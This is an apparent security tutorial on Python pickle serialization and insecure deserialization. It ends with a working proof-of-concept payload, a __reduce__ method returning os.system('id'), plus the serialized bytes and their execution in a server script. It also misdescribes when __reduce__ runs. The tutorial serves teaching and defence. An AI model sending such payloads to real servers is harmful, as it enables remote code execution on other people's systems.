Insecure Deserialization

From YouTube


Insecure Deserialization is a vulnerability that occurs when a client’s provided stream of binary is converted back to its original form on the server side.

Serialization and Deserialization

The process of converting any data or any object into a stream of binary is called serialization. For example, to store some values like in a game to store information about the player or in web apps to store session-related data on the client side, which later will be used by the web application to reduce multiple requests to the backend server and make the web application faster.

Let’s take an example of the process of serialization in Python. In Python, we use pickle module to serialize or deserialize the data.

# A user class to create some data objects
class User:
	def __init__(self, name, age):
		self.name = name
		self.age = age

	def summary(self):
		return "{} is {} year(s) old.".format(self.name, self.age)

# creating an object
hacker = User('Elliot Alderson', 29)

print(hacker.summary())

Now let’s serialize the object using pickle module, we can do that using dumps() function from pickle module.

# Serializing the data using dumps() function
serialized = pickle.dumps(hacker)
print(serialized)

and here’s the output of our little program

Elliot Alderson is 29 year(s) old.
b'\\x80\\x04\\x95>\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8c\\x08__main__\\x94\\x8c\\x04User\\x94\\x93\\x94)\\x81\\x94}\\x94(\\x8c\\x04name\\x94\\x8c\\x0fElliot Alderson\\x94\\x8c\\x03age\\x94K\\x1dub.'
[Finished in 22ms]

Now this serialized data can be transferred via the network or can be stored on the disk as a file.

# storing the serialized data in a local file
with open('user_data.pkl', 'wb') as file:
    file.write(serialized)
    print('Serialized object is written in \\'user_data.pkl\\' file.')
    
# | Output -----------------------------------
# | Elliot Alderson is 29 year(s) old.
# | b'\\x80\\x04\\x95>\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8c\\x08__main__\\x94\\x8c\\x04User\\x94\\x93\\x94)\\x81\\x94}\\x94(\\x8c\\x04name\\x94\\x8c\\x0fElliot Alderson\\x94\\x8c\\x03age\\x94K\\x1dub.'
# | Serialized object is written in 'user_data.pkl' file.
# | [Finished in 20ms]
# |
# | $ cat user_data.pkl
# | ��>�__main__��User���)��}�(�name��Elliot Alderson��age�Kub.
# |
# | $ file user_data.pkl
# | user_data.pkl: data

We can get a quick disassembly of the serialized data using pickletools module which is provided by default with Python.

import pickle # for data serialization and deserialization
import pickletools # for data dissassembly

# The User Class
class User:
	def __init__(self, name, age):
		self.name = name
		self.age = age

	def summary(self):
		return "{} is {} year(s) old.".format(self.name, self.age)

# Reading data from saved serialized object file
with open('user_data.pkl', 'rb') as fh:
	serialized = fh.read()

# getting the dissassembly of serialized data
print(pickletools.dis(serialized))

# Output -----------------------------------
# |     0: \\x80 PROTO      4
# |     2: \\x95 FRAME      62
# |    11: \\x8c SHORT_BINUNICODE '__main__'
# |    21: \\x94 MEMOIZE    (as 0)
# |    22: \\x8c SHORT_BINUNICODE 'User'
# |    28: \\x94 MEMOIZE    (as 1)
# |    29: \\x93 STACK_GLOBAL
# |    30: \\x94 MEMOIZE    (as 2)
# |    31: )    EMPTY_TUPLE
# |    32: \\x81 NEWOBJ
# |    33: \\x94 MEMOIZE    (as 3)
# |    34: }    EMPTY_DICT
# |    35: \\x94 MEMOIZE    (as 4)
# |    36: (    MARK
# |    37: \\x8c     SHORT_BINUNICODE 'name'
# |    43: \\x94     MEMOIZE    (as 5)
# |    44: \\x8c     SHORT_BINUNICODE 'Elliot Alderson'
# |    61: \\x94     MEMOIZE    (as 6)
# |    62: \\x8c     SHORT_BINUNICODE 'age'
# |    67: \\x94     MEMOIZE    (as 7)
# |    68: K        BININT1    29
# |    70: u        SETITEMS   (MARK at 36)
# |    71: b    BUILD
# |    72: .    STOP
# | highest protocol among opcodes = 4
# | None

Deserialization of data can be done using the loads() function from pickle module

# deserialization of the data
deserialized = pickle.loads(serialized)
print(deserialized.summary())

# Output ------------------------------------
# | Elliot Alderson is 29 year(s) old.

The complete script

import pickle # for serialization and deserialization
import pickletools # for data dissassembly

# A user class to create some data objects
class User:
	def __init__(self, name, age):
		self.name = name
		self.age = age

	def summary(self):
		return "{} is {} year(s) old.".format(self.name, self.age)

# creating an object
hacker = User('Elliot Alderson', 29)

print(hacker.summary())

# Serializing the data using dumps() function
serialized = pickle.dumps(hacker)
print(serialized)

# storing the serialized data in a local file
with open('user_data.pkl', 'wb') as file:
    file.write(serialized)
    print('Serialized object is written in \\'user_data.pkl\\' file.')

# Reading data from saved serialized object file
with open('user_data.pkl', 'rb') as fh:
	serializedfd = fh.read()

# getting the dissassembly of serialized data
print(pickletools.dis(serializedfd))

# deserialization of the data
deserialized = pickle.loads(serialized)
print(deserialized.summary())

The Vulnerability and Exploit

The Vulnerability

The vulnerability arises when we have to accept arbitrary input from the user or serializing user-controllable data, the user can very well add malicious code or data which can harm the system. For example, A web app is using the serialization and deserilization from storing some information in the session cookie, which will be serialized on the client side and deserialized again on the server side. what if we put some malicious code in the data before it’s being serialized, as the process of serialization is happening on the client side.

The Exploit

Let’s demonstrate this practically.

import pickle # for serialization and deserialization
import os # used later to get command execution

class User:
	def __reduce__(self):
		return (os.system, ('id',))

The key function in this script is the __reduce__() function. So what it does is, whenever we try to pickle (serialize) an object, there may be some parts of the object that may not be serialized well, like a open file handle .

Reduce function()

For example, before the with open() function in Python, there was a specific need to close the open file handles using f.close() method. So think of __reduce__() function as a cleanup function, which will be invoked when the serialization of the object is finished. The __reduce__() the function should return a tuple. where the 1st value should be a callable function and the 2nd value should be the arguments of the function, which also should be a tuple as there can be more than one argument for a function.

For example:

def __reduce__(self):
	# return (<callable function>, ('<first argument>', '<second argument>'))
	return (os.system, ('id',))

Adding some malicious function in the object to get a command injection.

import pickle # for serialization and deserialization
import os # used later to get command execution

# The original user class
class User:

	# the __reduct__() function will be invoked after
	# the serialization completes.
	def __reduce__(self):
		return (os.system, ('id',))

	def __init__(self, name, age):
		self.name = name
		self.age = age

	def summary(self):
		return "{} is {} year(s) old.".format(self.name, self.age)

# creating an object using user class
hacker = User('Elliot Alderson', 29)

# serializing the object
serialized = pickle.dumps(hacker)

print(serialized)

# Output -------------------------------------------
# | b'\\x80\\x04\\x95\\x1d\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8c\\x05posix\\x94\\x8c\\x06system\\x94\\x93\\x94\\x8c\\x02id\\x94\\x85\\x94R\\x94.'
# | [Finished in 20ms]

This script will create the object file with our malicious code which will include the __reduce__() function.

Now let’s load the data on the server side. here’s the server.py

import pickle

# our modified object with the reduce method
serialized = b'\\x80\\x04\\x95\\x1d\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8c\\x05posix\\x94\\x8c\\x06system\\x94\\x93\\x94\\x8c\\x02id\\x94\\x85\\x94R\\x94.'

pickle.loads(serialized)

# Output --------------------------------------
# | uid=1000(elliot) gid=1000(elliot) groups=1000(elliot),108(vboxusers),962(docker),994(input),998(wheel)
# | [Finished in 26ms]

And here we got the command injection.


Last updated